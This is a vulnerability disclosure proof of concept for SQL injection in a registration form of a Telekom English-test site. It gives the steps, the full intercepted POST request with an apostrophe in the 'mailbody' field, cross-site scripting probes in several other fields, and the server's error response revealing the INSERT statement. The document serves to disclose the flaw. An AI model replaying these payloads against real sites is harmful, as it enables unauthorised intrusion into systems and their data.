Proof of Concept (PoC):
=======================
The SQL injection vulnerability can be exploited by remote attackers without privileged application user account and without required user inter action. For demonstration or reproduce ...

a) The attacker should visit the main page to take the test
    https://gt.telekom.de/englishtest2004eng/html/intro.htm
b) The attacker should keep clicking on next until he reaches the final step in the test which is the page of  "Registration for the Fitness Check"
c) In the form of registering the test, we have many fields.
We fill the  up the vulnerable fields and then click on "Register" button

d) The attacker then should intercept the request and edit the "mailbody" paremter to an apsrophe that will generate the SQL error 

e) After forwarding the request, we will find the SQL error in the INSERT statement echoed back in the page

The post request that has been used to reproduce the image is:

POST /englishtest2004/test.asp HTTP/1.1
Host: gt.telekom.de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://gt.telekom.de/englishtest2004/html/intro_11.htm
Cookie: _ga=GA1.2.1524944686.1388633141; ASPSESSIONIDQAQRBTRB=PJJNFNFCCPEDGGLMFOGEGNGK
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 483

response=/englishtest2004/html/starttest.htm&to=hans-juergen.grunwald@telekom.de&from=&subject=Fokus_Sprachen_&_Seminare-Login&smtphost=localhost&mailbody='&NAME="><img src=x onerror=alert(1)>&VORNAME="><img src=x onerror=alert(1)>&PLZ="><img src=x onerror=alert(1)>&EMAIL="><img src=x onerror=alert(1)>&TELEFON="><img src=x onerror=alert(1)>&ORT="><img src=x onerror=alert(1)>


After forwarding the post request, a response will be received from the server similar to this:

HTTP/1.1 500 Internal Server Error
Date: Thu, 02 Jan 2014 03:49:47 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Content-Length: 572
Content-Type: text/html
Cache-control: private

insert into  Sprachtest(Name, Vorname,PersNr,Telefon,Fax, Ergebnis)VALUES ('"><img src=x onerror=alert(1)>','"><img src=x onerror=alert(1)>','','"><img src=x onerror ',' ','''); <font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>[Microsoft][ODBC SQL Server Driver][SQL Server]Kein schließendes Anführungszeichen nach der Zeichenfolge '');'.</font>
<p>
<font face="Arial" size=2>/englishtest2004/test.asp</font><font face="Arial" size=2>, line 23</font>